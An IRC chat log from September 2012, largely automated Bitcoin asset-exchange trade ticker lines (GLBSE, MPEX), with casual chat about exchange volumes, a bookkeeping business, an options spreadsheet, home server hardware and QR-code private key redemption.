believe you Sep 29 20:50:19 tell me Sep 29 20:50:39 lol you don't believe what ? Sep 29 20:59:25 [MPEX] [S.MPOE] 5100 @ 0.00037069 = 1.8905 BTC [+] Sep 29 21:10:47 [GLBSE] [RAREEARTH] 110 @ 0.01 = 1.1 BTC [+] Sep 29 21:19:58 let me see the MPEX accounting Sep 29 21:20:15 i will show everyone that mpex is real Sep 29 21:20:17 and the volume is true Sep 29 21:20:29 that guy on the forum said the weekly mpex is less than glbse daily Sep 29 21:20:32 is that true? Sep 29 21:20:44 lol not rly. Sep 29 21:20:47 about 5x or w/e Sep 29 21:20:53 and is it daily buys Sep 29 21:20:54 or Sep 29 21:20:56 income BTC Sep 29 21:20:57 that people put in Sep 29 21:21:04 incoming* Sep 29 21:21:12 he confused me Sep 29 21:21:19 glbse doesn't report that. they report their 5 days averages, and they sum up to ~2-3k Sep 29 21:21:23 which is less than mpex daily. Sep 29 21:23:56 [GLBSE] [JTME] 3 @ 0.78987973 = 2.3696 BTC [+] Sep 29 21:24:42 [GLBSE] [PUREMINING] 29 @ 0.1034 = 2.9986 BTC [+] Sep 29 21:25:01 [MPEX] [S.MPOE] 40548 @ 0.00037165 = 15.0697 BTC [+] Sep 29 21:25:03 [MPEX] [S.MPOE] 8947 @ 0.0003721 = 3.3292 BTC [+] Sep 29 21:25:10 [GLBSE] [007] 4 @ 0.112 = 0.448 BTC [-] Sep 29 21:26:37 [GLBSE] [YABMC] 2 @ 0.07897999 = 0.158 BTC [+] Sep 29 21:26:38 [GLBSE] [YABMC] 2 @ 0.07898 = 0.158 BTC [+] Sep 29 21:31:39 [GLBSE] [LTC-MINING] 1 @ 0.56999899 BTC [+] Sep 29 21:33:51 [GLBSE] [BBBB] 1 @ 0.000128 BTC [-] Sep 29 21:35:22 [GLBSE] [NASTY] 1 @ 0.36375 BTC [-] Sep 29 21:38:52 [GLBSE] [MU] 2 @ 0.19 = 0.38 BTC [-] Sep 29 21:42:33 [GLBSE] [MERGEDMINING] 1 @ 0.064944 BTC [-] Sep 29 21:45:41 [GLBSE] [RAREEARTH] 14 @ 0.01 = 0.14 BTC [+] Sep 29 21:47:26 [GLBSE] [RAREEARTH] 2 @ 0.00999999 = 0.02 BTC [-] Sep 29 21:47:28 [GLBSE] [RAREEARTH] 10 @ 0.01 = 0.1 BTC [+] Sep 29 21:50:25 [MPEX] [S.BVPS] 100 @ 0.00349208 = 0.3492 BTC [-] Sep 29 21:50:26 [MPEX] [S.BVPS] 38 @ 0.0034919 = 0.1327 BTC [-] Sep 29 21:58:27 [GLBSE] [FPGAMINING] 1 @ 0.42000001 BTC [-] Sep 29 22:00:06 [GLBSE] [DI.BFLSC.SUCCEED] 1 @ 0.0009 BTC [-] Sep 29 22:03:53 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Sep 29 22:15:57 [MPEX] [F.GIGA.ETF] 3000 @ 0.00044037 = 1.3211 BTC [+] Sep 29 22:15:59 [MPEX] [F.GIGA.ETF] 2000 @ 0.00044037 = 0.8807 BTC [+] Sep 29 22:16:00 [MPEX] [S.MPOE] 8763 @ 0.00037069 = 3.2484 BTC [-] Sep 29 22:24:32 [GLBSE] [KRAKEN] 3 @ 0.0089 = 0.0267 BTC [+] Sep 29 22:35:46 [GLBSE] [NASTY] 9 @ 0.36375 = 3.2738 BTC [-] Sep 29 22:36:27 [GLBSE] [NASTY] 13 @ 0.36385 = 4.7301 BTC [+] Sep 29 22:37:23 [GLBSE] [NASTY] 17 @ 0.365 = 6.205 BTC [+] Sep 29 22:37:57 [GLBSE] [CBGB] 2 @ 0.499 = 0.998 BTC [-] Sep 29 22:41:06 [MPEX] [F.GIGA.ETF] 1035 @ 0.00044036 = 0.4558 BTC [-] Sep 29 22:41:07 [MPEX] [F.GIGA.ETF] 6165 @ 0.00044036 = 2.7148 BTC [-] Sep 29 23:06:13 [MPEX] [S.MPOE] 3800 @ 0.0003692 = 1.403 BTC [-] Sep 29 23:14:37 hey Luke-Jr fix your flooding problem I have your nickname on highlight. Sep 29 23:22:34 [GLBSE] [FPGAMINING] 1 @ 0.49489999 BTC [+] Sep 29 23:22:36 [GLBSE] [FPGAMINING] 5 @ 0.4949 = 2.4745 BTC [+] Sep 29 23:25:28 [GLBSE] [BITBOND] 1 @ 0.359789 BTC [-] Sep 29 23:25:29 [GLBSE] [BITBOND] 4 @ 0.35979 = 1.4392 BTC [+] Sep 29 23:26:06 [GLBSE] [HYDRO.BONDS] 1 @ 1.39138 BTC [+] Sep 29 23:26:08 [GLBSE] [HYDRO.BONDS] 2 @ 1.39328 = 2.7866 BTC [+] Sep 29 23:26:09 [GLBSE] [HYDRO.BONDS] 4 @ 1.39338 = 5.5735 BTC [+] Sep 29 23:26:10 [GLBSE] [HYDRO.BONDS] 1 @ 1.39339 BTC [+] Sep 29 23:26:12 [GLBSE] [HYDRO.BONDS] 2 @ 1.3955 = 2.791 BTC [+] Sep 29 23:26:13 [GLBSE] [HYDRO.BONDS] 1 @ 1.3955 BTC [+] Sep 29 23:26:14 [GLBSE] [HYDRO.BONDS] 4 @ 1.3975 = 5.59 BTC [+] Sep 29 23:26:14 [GLBSE] [HYDRO.BONDS] 1 @ 1.398 BTC [+] Sep 29 23:26:15 [GLBSE] [HYDRO.BONDS] 4 @ 1.4 = 5.6 BTC [+] Sep 29 23:27:03 [GLBSE] [YABMC] 15 @ 0.079 = 1.185 BTC [+] Sep 29 23:27:12 [GLBSE] [HYDRO.BONDS] 10 @ 1.4 = 14 BTC [+] Sep 29 23:27:51 [GLBSE] [HYDRO.BONDS] 1 @ 1.4 BTC [+] Sep 29 23:28:50 [GLBSE] [007] 15 @ 0.11399999 = 1.71 BTC [+] Sep 29 23:28:52 [GLBSE] [007] 1 @ 0.114 BTC [+] Sep 29 23:31:23 [MPEX] [F.GIGA.ETF] 2401 @ 0.00044036 = 1.0573 BTC [-] Sep 29 23:31:24 [MPEX] [F.GIGA.ETF] 99 @ 0.00044036 = 0.0436 BTC [-] Sep 29 23:31:26 [MPEX] [S.MPOE] 17900 @ 0.00036783 = 6.5842 BTC [-] Sep 29 23:31:27 [MPEX] [S.MPOE] 42900 @ 0.00036774 = 15.776 BTC [-] Sep 29 23:35:57 [GLBSE] [ZETA-MINING] 1 @ 0.17654321 BTC [-] Sep 29 23:36:59 [GLBSE] [ZETA-MINING] 5 @ 0.177 = 0.885 BTC [+] Sep 29 23:38:58 [GLBSE] [COGNITIVE] 2 @ 0.475 = 0.95 BTC [-] Sep 29 23:41:25 [GLBSE] [CPA] 10 @ 0.04444 = 0.4444 BTC [+] Sep 29 23:56:30 [MPEX] [S.MPOE] 25100 @ 0.00036774 = 9.2303 BTC [-] Sep 29 23:56:32 [MPEX] [S.MPOE] 25670 @ 0.00036545 = 9.3811 BTC [-] Sep 30 00:01:22 [GLBSE] [BFLS.RIG] 1 @ 0.6301 BTC [-] Sep 30 00:01:23 [GLBSE] [BFLS.RIG] 1 @ 0.63 BTC [-] Sep 30 00:02:35 [GLBSE] [OBSI.HRPT] 1 @ 0.02200001 BTC [-] Sep 30 00:02:45 [GLBSE] [BFLS] 3 @ 0.54995 = 1.6499 BTC [+] Sep 30 00:03:03 [GLBSE] [BFLS.RIG] 1 @ 0.6 BTC [-] Sep 30 00:03:46 [GLBSE] [OBSI.HRPT] 2 @ 0.022 = 0.044 BTC [-] Sep 30 00:04:59 [GLBSE] [OBSI.HRPT] 1 @ 0.02102001 BTC [-] Sep 30 00:06:26 [GLBSE] [OBSI.HRPT] 2 @ 0.02102 = 0.042 BTC [-] Sep 30 00:07:32 [GLBSE] [OBSI.HRPT] 11 @ 0.02002 = 0.2202 BTC [-] Sep 30 00:08:22 [GLBSE] [OBSI.HRPT] 100 @ 0.02 = 2 BTC [-] Sep 30 00:11:42 [GLBSE] [BLUECHIP] 16 @ 0.1 = 1.6 BTC [+] Sep 30 00:12:18 [GLBSE] [GMVT-BOT] 94 @ 0.1 = 9.4 BTC [-] Sep 30 00:19:13 [GLBSE] [GMVT-BOT] 1 @ 0.095 BTC [-] Sep 30 00:20:29 [GLBSE] [GMVT-BOT] 20 @ 0.09 = 1.8 BTC [-] Sep 30 00:21:17 [GLBSE] [OBSI.HRPT] 1 @ 0.03399999 BTC [+] Sep 30 00:21:19 [GLBSE] [OBSI.HRPT] 63 @ 0.034 = 2.142 BTC [+] Sep 30 00:21:19 [GLBSE] [OBSI.HRPT] 50 @ 0.035 = 1.75 BTC [+] Sep 30 00:21:20 [GLBSE] [OBSI.HRPT] 50 @ 0.039 = 1.95 BTC [+] Sep 30 00:21:22 [GLBSE] [OBSI.HRPT] 46 @ 0.04 = 1.84 BTC [+] Sep 30 00:21:23 [GLBSE] [OBSI.HRPT] 2 @ 0.04105551 = 0.0821 BTC [+] Sep 30 00:21:24 [GLBSE] [OBSI.HRPT] 3 @ 0.04498 = 0.1349 BTC [+] Sep 30 00:21:25 [GLBSE] [OBSI.HRPT] 129 @ 0.045 = 5.805 BTC [+] Sep 30 00:21:26 [GLBSE] [OBSI.HRPT] 4 @ 0.04997 = 0.1999 BTC [+] Sep 30 00:21:27 [GLBSE] [OBSI.HRPT] 4 @ 0.04997 = 0.1999 BTC [+] Sep 30 00:21:28 [GLBSE] [OBSI.HRPT] 18 @ 0.04999999 = 0.9 BTC [+] Sep 30 00:21:29 [GLBSE] [OBSI.HRPT] 22 @ 0.05 = 1.1 BTC [+] Sep 30 00:21:53 [GLBSE] [GMVT-BOT] 44 @ 0.07 = 3.08 BTC [-] Sep 30 00:22:22 [MPEX] [F.GIGA.ETF] 730 @ 0.00044037 = 0.3215 BTC [+] Sep 30 00:23:25 [GLBSE] [YABMC] 9 @ 0.07978 = 0.718 BTC [+] Sep 30 00:25:13 [GLBSE] [OBSI.HRPT] 8 @ 0.04998 = 0.3998 BTC [-] Sep 30 00:25:36 [GLBSE] [YABMC] 9 @ 0.07986 = 0.7187 BTC [+] Sep 30 00:27:37 [GLBSE] [OBSI.HRPT] 13 @ 0.049979 = 0.6497 BTC [-] Sep 30 00:27:39 [GLBSE] [OBSI.HRPT] 1 @ 0.04997999 BTC [+] Sep 30 00:27:39 [GLBSE] [OBSI.HRPT] 1 @ 0.04998 BTC [+] Sep 30 00:31:25 [GLBSE] [OBSI.HRPT] 4 @ 0.049 = 0.196 BTC [-] Sep 30 00:31:26 [GLBSE] [OBSI.HRPT] 3 @ 0.049979 = 0.1499 BTC [+] Sep 30 00:38:08 [GLBSE] [GIGAMINING] 2 @ 0.54499999 = 1.09 BTC [-] Sep 30 00:38:27 usagi scammer tag? Sep 30 00:38:49 me? nope Sep 30 00:39:03 i'm saving money to launch a biz Sep 30 00:39:05 usagi got tagged? Sep 30 00:39:10 an accounting company Sep 30 00:39:12 I bougth some today yes Sep 30 00:39:33 oh jeez, i can't read the last word of questions, it seems Sep 30 00:39:44 what, on the forum ? Sep 30 00:40:08 Smoovious: I have family who are accountants, and I've been studying accounting for a while now Sep 30 00:40:20 (it'll actually be a bookkeeping company) Sep 30 00:40:34 [GLBSE] [GIGAMINING] 2 @ 0.545 = 1.09 BTC [+] Sep 30 00:41:13 fuck, came home slightly drunk just to find out this time you had to pay the dividend *twice*.. and coinbr is still not fixed to pay it fully automatically Sep 30 00:41:17 Smoovious: I have a few clients lined up who are bitcoin related Sep 30 00:41:21 i mean S.MPOE Sep 30 00:42:09 smickles: how much to launder money from meth biz through car wash? Sep 30 00:42:09 [GLBSE] [GIGAMINING] 1 @ 0.55 BTC [+] Sep 30 00:42:10 My plan is to provide good service to a few clients and expand with the funds I gain Sep 30 00:42:48 Obsi: would you agree to compensate me for potential jail time? Sep 30 00:43:17 but jail has free food Sep 30 00:43:54 i'm outta here.. goodnight Sep 30 00:44:04 Obsi: it separated me from my wife and daughter tho :P Sep 30 00:44:08 jurov hello there :) Sep 30 00:44:19 some would pay for such things Sep 30 00:44:26 i fucked up, only paid part the first time. sorry! Sep 30 00:44:31 Smoovious: Sounds good to me, USD-mostly makes it easier Sep 30 00:46:01 [GLBSE] [OBSI.HRPT] 1 @ 0.049979 BTC [+] Sep 30 00:46:08 Smoovious: indeed, I've got a little redtape to deal with myself, so in a couple/few months, I should have a smoothe operation running :) Sep 30 00:46:23 [GLBSE] [OBSI.HRPT] 1 @ 0.03000001 BTC [-] Sep 30 00:47:26 [MPEX] [S.MPOE] 10000 @ 0.0003641 = 3.641 BTC [-] Sep 30 00:47:28 [MPEX] [S.MPOE] 10000 @ 0.00036409 = 3.6409 BTC [-] Sep 30 00:47:29 [MPEX] [S.MPOE] 21500 @ 0.000364 = 7.826 BTC [-] Sep 30 00:48:20 smickles: you do any consulting? Sep 30 00:48:38 Obsi: If it falls in my sphere of knowledge, I certainly could Sep 30 00:49:02 What rates? Sep 30 00:49:02 Pretty much, I just won't be able to do audits, because I'm not a CPA (yet) Sep 30 00:49:44 LLC all the things! Sep 30 00:50:33 Obsi: Right now, it looks like the fee will be 5.6 an hour once I incorporate Sep 30 00:50:55 pre-incorporation discounts? :-D Sep 30 00:51:24 pre-incorporation i am busy moving from NC to AZ Sep 30 00:51:54 Smoovious: sounds cool, you said this is going to be in Michigan? Sep 30 00:51:57 (sp?) Sep 30 00:52:00 you gonna dry out and feel like a rasin for 2 weeks Sep 30 00:55:26 How about that. it sounds like it would be interesting to do work for you :) Sep 30 00:55:40 (on the bean counter side that is) Sep 30 00:57:01 That'd be best practice, renaming accounts ;) Sep 30 00:59:31 Smoovious: ever been thru/in Vaughn, NM? Sep 30 01:00:28 heh, I dunno, I don't even have a cell signal here! Sep 30 01:00:42 cell signals are for pussies Sep 30 01:01:37 [GLBSE] [COGNITIVE] 2 @ 0.4795 = 0.959 BTC [+] Sep 30 01:02:54 There's a diner, one of those wrapped-in-sheet-metal kind Sep 30 01:11:22 [GLBSE] [SILVER] 8 @ 0.00999994 = 0.08 BTC [-] Sep 30 01:11:24 [GLBSE] [SILVER] 1 @ 0.00999995 BTC [+] Sep 30 01:11:25 [GLBSE] [SILVER] 2 @ 0.00999997 = 0.02 BTC [+] Sep 30 01:12:55 [MPEX] [S.MPOE] 4000 @ 0.000364 = 1.456 BTC [-] Sep 30 01:30:04 [GLBSE] [GIGAMINING] 1 @ 0.55 BTC [+] Sep 30 01:36:52 [GLBSE] [MOORE] 1 @ 0.47 BTC [+] Sep 30 01:38:05 [MPEX] [F.GIGA.ETF] 7400 @ 0.00044037 = 3.2587 BTC [+] Sep 30 01:41:43 [GLBSE] [DI.BFLSC.FAIL] 1420 @ 0.001 = 1.42 BTC [+] Sep 30 01:42:00 [GLBSE] [DI.BFLSC.FAIL] 2000 @ 0.001 = 2 BTC [+] Sep 30 01:42:05 [GLBSE] [COGNITIVE] 4 @ 0.4799 = 1.9196 BTC [+] Sep 30 02:00:00 [GLBSE] [SILVER] 5 @ 0.00911111 = 0.0456 BTC [-] Sep 30 02:00:50 Got some loose change to spend. Anyone selling anything? Sep 30 02:01:26 i got a bridge... Sep 30 02:01:31 [GLBSE] [CIUCIU.BOND] 500 @ 0.099 = 49.5 BTC [+] Sep 30 02:01:46 [GLBSE] [COGNITIVE] 1 @ 0.48 BTC [+] Sep 30 02:03:22 [MPEX] [F.GIGA.ETF] 1270 @ 0.00044036 = 0.5593 BTC [-] Sep 30 02:03:23 [MPEX] [S.MPOE] 4400 @ 0.000364 = 1.6016 BTC [-] Sep 30 02:03:43 [GLBSE] [COGNITIVE] 5 @ 0.48 = 2.4 BTC [+] Sep 30 02:05:20 [GLBSE] [COGNITIVE] 1 @ 0.48 BTC [+] Sep 30 02:08:18 [GLBSE] [NASTY] 3 @ 0.3773 = 1.1319 BTC [+] Sep 30 02:08:44 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Sep 30 02:08:45 [GLBSE] [DMC] 1 @ 0.0555 BTC [+] Sep 30 02:08:46 [GLBSE] [DMC] 1 @ 0.055 BTC [-] Sep 30 02:09:34 [GLBSE] [SILVER] 11 @ 0.00911111 = 0.1002 BTC [-] Sep 30 02:09:43 A bridge? Sounds nice Sep 30 02:12:12 [GLBSE] [SILVER] 10 @ 0.00911111 = 0.0911 BTC [-] Sep 30 02:12:14 [GLBSE] [SILVER] 3 @ 0.0091111 = 0.0273 BTC [-] Sep 30 02:12:47 [GLBSE] [COGNITIVE] 1 @ 0.48 BTC [+] Sep 30 02:21:53 :p Sep 30 02:23:03 I could offer a mailbox Sep 30 02:23:14 Or a money making machine Sep 30 02:23:23 xD Sep 30 02:28:29 [MPEX] [S.MPOE] 14530 @ 0.00036499 = 5.3033 BTC [+] Sep 30 02:36:16 [GLBSE] [NASTY] 1 @ 0.3775 BTC [+] Sep 30 02:51:23 [GLBSE] [SILVER] 1 @ 0.00999996 BTC [+] Sep 30 02:54:05 [MPEX] [F.GIGA.ETF] 7700 @ 0.00044036 = 3.3908 BTC [-] Sep 30 02:54:20 [GLBSE] [SILVER] 4 @ 0.00999996 = 0.04 BTC [+] Sep 30 03:07:01 [GLBSE] [BBBB] 7 @ 0.000128 = 0.0009 BTC [-] Sep 30 03:11:38 [GLBSE] [YABIF] 4 @ 0.8 = 3.2 BTC [-] Sep 30 03:11:39 [GLBSE] [YABIF] 1 @ 0.7912 BTC [-] Sep 30 03:11:40 [GLBSE] [YABIF] 5 @ 0.78 = 3.9 BTC [-] Sep 30 03:19:11 [MPEX] [S.MPOE] 21400 @ 0.00036743 = 7.863 BTC [+] Sep 30 03:19:58 [GLBSE] [ASICMINER] 10 @ 0.11 = 1.1 BTC [-] Sep 30 03:31:17 [GLBSE] [KRAKEN] 3 @ 0.008 = 0.024 BTC [-] Sep 30 03:38:08 [GLBSE] [BTC-MINING] 1 @ 0.97 BTC [-] Sep 30 03:39:55 [GLBSE] [PAJKA.BOND] 1 @ 0.082 BTC [-] Sep 30 03:41:32 [GLBSE] [MMM] 10 @ 0.799 = 7.99 BTC [-] Sep 30 03:44:29 [MPEX] [S.MPOE] 27500 @ 0.00036743 = 10.1043 BTC [+] Sep 30 03:45:52 [GLBSE] [OBSI.HRPT] 2 @ 0.03002 = 0.06 BTC [+] Sep 30 03:46:17 [GLBSE] [GIGAMINING] 4 @ 0.55 = 2.2 BTC [+] Sep 30 03:47:23 [GLBSE] [NASTY] 7 @ 0.3775 = 2.6425 BTC [+] Sep 30 03:52:35 [GLBSE] [OBSI.HRPT] 3 @ 0.03 = 0.09 BTC [-] Sep 30 04:02:54 Hmm, I've made a tool so you can check the current value of CALL/PUT contracts Sep 30 04:03:43 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=0 Sep 30 04:04:09 If anyone want to try, only the current price should be editable. Sep 30 04:04:49 meh asks me to sign in Sep 30 04:05:40 sorry, re-edited it Sep 30 04:05:46 well changed settings I mean Sep 30 04:05:53 Should be public now Sep 30 04:06:59 [GLBSE] [NASTY] 2 @ 0.36000001 = 0.72 BTC [-] Sep 30 04:07:01 [GLBSE] [NASTY] 2 @ 0.36 = 0.72 BTC [-] Sep 30 04:07:02 [GLBSE] [NASTY] 1 @ 0.3502 BTC [-] Sep 30 04:07:03 [GLBSE] [NASTY] 2 @ 0.35 = 0.7 BTC [-] Sep 30 04:07:17 well i cant edit any values ? Sep 30 04:07:43 arf... wait a minute Sep 30 04:09:10 Should work now Sep 30 04:09:22 Not sure how to remove the protected range view by default tho Sep 30 04:09:33 [MPEX] [F.GIGA.ETF] 170 @ 0.00044037 = 0.0749 BTC [+] Sep 30 04:09:34 [MPEX] [F.GIGA.ETF] 5500 @ 0.00044037 = 2.422 BTC [+] Sep 30 04:09:35 [MPEX] [F.GIGA.ETF] 4130 @ 0.00044037 = 1.8187 BTC [+] Sep 30 04:09:49 yp seems legit Sep 30 04:11:27 Will be easier to spot good contracts to buy sell depending on what exchange rate is expected. Sep 30 04:12:11 (i kinda do this in my head, i'm guessing most options people do too) Sep 30 04:12:57 Yeah, not really hard to calculate, but it's faster to quickly browse all options with chart beside Sep 30 04:13:12 and check multiple scenarios Sep 30 04:13:48 (I also love making spreadsheet tools) Sep 30 04:15:18 :p Sep 30 04:16:55 If anyone wants to bookmark it anyway, it's there now Sep 30 04:34:48 [MPEX] [F.GIGA.ETF] 1625 @ 0.00044037 = 0.7156 BTC [+] Sep 30 04:34:49 [MPEX] [F.GIGA.ETF] 6200 @ 0.00044037 = 2.7303 BTC [+] Sep 30 04:34:51 [MPEX] [F.GIGA.ETF] 3028 @ 0.00044037 = 1.3334 BTC [+] Sep 30 04:34:52 [MPEX] [F.GIGA.ETF] 447 @ 0.00044037 = 0.1968 BTC [+] Sep 30 04:45:49 Are MPEx deposits automatically validated? Sep 30 05:00:05 [MPEX] [F.GIGA.ETF] 235 @ 0.00044036 = 0.1035 BTC [-] Sep 30 05:00:06 [MPEX] [F.GIGA.ETF] 3100 @ 0.00044036 = 1.3651 BTC [-] Sep 30 05:00:07 [MPEX] [F.GIGA.ETF] 4100 @ 0.00044036 = 1.8055 BTC [-] Sep 30 05:00:08 [MPEX] [F.GIGA.ETF] 2791 @ 0.00044036 = 1.229 BTC [-] Sep 30 05:02:43 BTC-Mining nope Sep 30 05:06:44 [GLBSE] [FDBF] 30 @ 0.1492529 = 4.4776 BTC [-] Sep 30 05:06:46 [GLBSE] [FDBF] 120 @ 0.149253 = 17.9104 BTC [+] **** BEGIN LOGGING AT Sun Sep 30 13:50:21 2012 Sep 30 13:50:32 but... thats still a nas Sep 30 13:51:22 its more than nas Sep 30 13:51:44 nas just describes what its primary role is Sep 30 13:51:59 hp microserver is just a generic linux board put inside of a standard 4 drive enclosure Sep 30 13:52:13 generic linux board? Sep 30 13:52:15 orly Sep 30 13:52:30 the ones Ive seen are some ulv intel x86 cpu Sep 30 13:52:37 I wonder why they havent switched to arm Sep 30 13:53:00 or hell, if raspberry pi had a 4x sata version, you could build your own Sep 30 13:53:16 this has a dual core turion Sep 30 13:53:19 and ecc ram Sep 30 13:53:42 its a server grade hw Sep 30 13:54:07 thats probably a newer model Sep 30 13:55:13 ill put a ssd in as well Sep 30 13:55:24 to run some vpses Sep 30 13:55:31 ;> Sep 30 13:56:18 i guess i need to switch to gigabit network as well Sep 30 13:56:24 [MPEX] [S.MPOE] 9100 @ 0.00036595 = 3.3301 BTC [-] Sep 30 13:56:26 [MPEX] [S.MPOE] 29720 @ 0.00036555 = 10.8641 BTC [-] Sep 30 13:56:26 heh Sep 30 13:56:27 [MPEX] [S.MPOE] 25480 @ 0.00036518 = 9.3048 BTC [-] Sep 30 13:56:53 these 7200.14 drives can sequential read at 210mb/se Sep 30 13:56:56 thats fast :< Sep 30 14:14:59 hm Sep 30 14:15:13 any android app can read qr code private keys and redeem them somehow? Sep 30 14:15:26 no, but that'd be interesting Sep 30 14:15:42 wait Sep 30 14:15:43 i need that Sep 30 14:15:44 no it wouldnt Sep 30 14:15:54 because you could use that as a potential double spend attack Sep 30 14:16:03 eh? Sep 30 14:16:04 it'd only be useful if you were physically moving your own wallets Sep 30 14:16:12 mtgox has a redeem private key option Sep 30 14:16:13 er, electronically Sep 30 14:16:18 kakobrekla: yes, and it shouldnt Sep 30 14:16:25 ... Sep 30 14:16:34 kakobrekla there's not one yet afaik Sep 30 14:16:36 well, no, that no correct Sep 30 14:16:46 if they wait the usual 6 blocks, thats fine Sep 30 14:16:54 why is bitcoin fuckim me in the ass Sep 30 14:16:57 but on an android app, the implication would be instant checkout Sep 30 14:16:59 fuckin* Sep 30 14:17:56 what we need is a new form of private key Sep 30 14:18:06 one that can be checked instantly for validity Sep 30 14:18:21 and cannot be double spent Sep 30 14:18:23 Diablo-D3 Sep 30 14:18:28 they will move the coins Sep 30 14:18:33 when you redeem it Sep 30 14:18:37 kakobrekla: yes, but what if I already did Sep 30 14:18:40 w/o confirmations Sep 30 14:19:01 if you moved the coins off it Sep 30 14:19:06 they wont be able to Sep 30 14:19:16 gen qr code, generate move tx, scan qr code on other machine, they gen move tx Sep 30 14:19:16 to get confirms Sep 30 14:19:19 on the transactions Sep 30 14:19:30 Ive already walked out of the shop by the time they realize they've been had Sep 30 14:19:38 ergo, double spend Sep 30 14:19:43 Diablo-D3 do it then Sep 30 14:19:53 proove it Sep 30 14:21:10 I think he might still be asleep Sep 30 14:21:15 anyhow, theres nothing to prove Sep 30 14:21:23 you should already know thats a potential double spend attack Sep 30 14:21:33 [MPEX] [S.MPOE] 4320 @ 0.00036518 = 1.5776 BTC [-] Sep 30 14:21:35 [MPEX] [S.MPOE] 17980 @ 0.000364 = 6.5447 BTC [-] Sep 30 14:21:35 your tx will get refused if they got 1 confirm on it Sep 30 14:21:41 or even if 0 conf Sep 30 14:21:44 no Sep 30 14:21:52 I just walked out of the store with the merchendise. Sep 30 14:22:11 since I emitted the TX first, most likely mine wins the race Sep 30 14:22:26 Diablo-D3 so you have to wait a moment for the confirm wtf. Sep 30 14:22:46 mircea_popescu: 10 minutes? Sep 30 14:22:54 the whole point of a qr code private key is to instantly check out Sep 30 14:22:59 not 10 minutes Sep 30 14:23:09 if you've gone even 1 minute w/io a competing transaction propagating Sep 30 14:23:13 you're good enough Sep 30 14:23:16 wont work Sep 30 14:23:30 because why Sep 30 14:23:36 if Ive figured out the store's node network, I can spam the tx on the other side of the network Sep 30 14:23:44 bitcoin has a bad habit of not being a well connected network Sep 30 14:23:54 the store uses an app which polls distributed nodes. Sep 30 14:24:15 yes but you need enough looking glasses to do that Sep 30 14:24:19 theres no such service yet Sep 30 14:24:30 so it's a business venue for someone to provide this service to stores Sep 30 14:24:37 which i gather kakobrekla is trying to do Sep 30 14:24:38 or w/e Sep 30 14:24:58 no i need this shit for something else Sep 30 14:25:05 lol tough luck :D Sep 30 14:25:10 why Sep 30 14:25:16 now you have to make thios app hehe Sep 30 14:25:29 bitcoin is like a badly stocked kitchen. you want soup ? gotta make noodles first! Sep 30 14:25:38 well i need a qr code private key scanner & redeemer Sep 30 14:25:53 nothing else Sep 30 14:25:56 i think cascacisiuciscacosciosmus Sep 30 14:25:58 or w/e his name is Sep 30 14:26:03 had something like that he was uisng Sep 30 14:26:06 with a qr gun Sep 30 14:26:10 hm Sep 30 14:28:23 [GLBSE] [HYDRO.BONDS] 3 @ 1.4468 = 4.3404 BTC [+] Sep 30 14:28:57 https://bitcointalk.org/index.php?topic=113708.msg1233234#msg1233234 whoa checjk this out. Sep 30 14:29:01 mircea_popescu: yeah but those were pregenerated and considered safe Sep 30 14:29:09 typical glbse business : takes in 17k btc rfrom investors, pays 1.2k in dividends Sep 30 14:29:19 current optimisitc net value ? 7k. loss ? 9k. Sep 30 14:29:54 [GLBSE] [ASICMINER] 1 @ 0.10110001 BTC [+] Sep 30 14:31:00 [GLBSE] [HYDRO.BONDS] 1 @ 1.4468 BTC [+] Sep 30 14:33:05 [GLBSE] [BFLS] 2 @ 0.48 = 0.96 BTC [+] Sep 30 14:34:38 >>Mt. Gox mobile, available from Google Play and on jailbroken iPhones using Cydia allows you to redeem private key QR codes into your Mt. Gox account. Sep 30 14:34:46 jesus. Sep 30 14:35:07 i hope it works on droid Sep 30 14:35:31 .g cydia android Sep 30 14:35:32 mircea_popescu: https://play.google.com/store/apps/details?id=com.appsbar.CydiaDownload20234&hl=en Sep 30 14:35:37 dun dun dun Sep 30 14:36:06 i think cydia is for jesusphone Sep 30 14:36:28 oh wait Sep 30 14:37:57 lol Sep 30 14:38:00 ;;seen nefario Sep 30 14:38:01 nefario was last seen in #bitcoin-assets 5 days, 15 hours, 38 minutes, and 6 seconds ago: Those assets are not listed or traded anymore Sep 30 14:38:03 cydia is a jailbroken iphone store. Sep 30 14:38:07 sooo... is he in jail ? Sep 30 14:38:22 mircea_popescu: yeah, I dont like where this is headed Sep 30 14:43:41 [GLBSE] [PAJKA.BOND] 1 @ 0.082 BTC [-] Sep 30 14:46:38 [MPEX] [F.GIGA.ETF] 6000 @ 0.00044037 = 2.6422 BTC [+] Sep 30 14:52:17 aha yeah Diablo-D3 thought smth like that Sep 30 14:52:26 cause i got mtgox app runin already wo it Sep 30 14:53:29 o yea it works Sep 30 14:53:29 nice Sep 30 14:55:40 btw mircea_popescu, i havent forgot about mpex and smpake - i will be getting on it soonish nao ;> Sep 30 14:55:53 hm ? Sep 30 14:56:18 the insta transfers to mpex? Sep 30 14:56:31 you do remember that? Sep 30 14:58:36 [GLBSE] [RSM] 4 @ 0.28 = 1.12 BTC [-] Sep 30 15:02:43 [GLBSE] [MERGEDMINING] 1 @ 0.06299999 BTC [+] Sep 30 15:02:44 [GLBSE] [MERGEDMINING] 1 @ 0.063 BTC [+] Sep 30 15:04:30 a yes yes. Sep 30 15:04:49 well ok. Sep 30 15:12:04 [MPEX] [S.MPOE] 49000 @ 0.000364 = 17.836 BTC [-] Sep 30 15:20:49 [GLBSE] [BDK.BND] 9 @ 0.06502 = 0.5852 BTC [+] Sep 30 15:20:51 [GLBSE] [BDK.BND] 57 @ 0.065 = 3.705 BTC [-] Sep 30 15:20:52 [GLBSE] [BDK.BND] 40 @ 0.06002 = 2.4008 BTC [-] Sep 30 15:20:52 [GLBSE] [BDK.BND] 194 @ 0.06 = 11.64 BTC [-] Sep 30 15:21:05 [GLBSE] [SILVER] 2 @ 0.00999996 = 0.02 BTC [+] Sep 30 15:21:07 [GLBSE] [SILVER] 75 @ 0.00999997 = 0.75 BTC [+] Sep 30 15:21:08 [GLBSE] [SILVER] 23 @ 0.00999999 = 0.23 BTC [+] Sep 30 15:22:03 [GLBSE] [BDK.BND] 6 @ 0.06 = 0.36 BTC [-] Sep 30 15:37:05 [MPEX] [F.GIGA.ETF] 500 @ 0.00044037 = 0.2202 BTC [+] Sep 30 15:37:07 [MPEX] [F.GIGA.ETF] 7100 @ 0.00044037 = 3.1266 BTC [+] Sep 30 15:37:08 [MPEX] 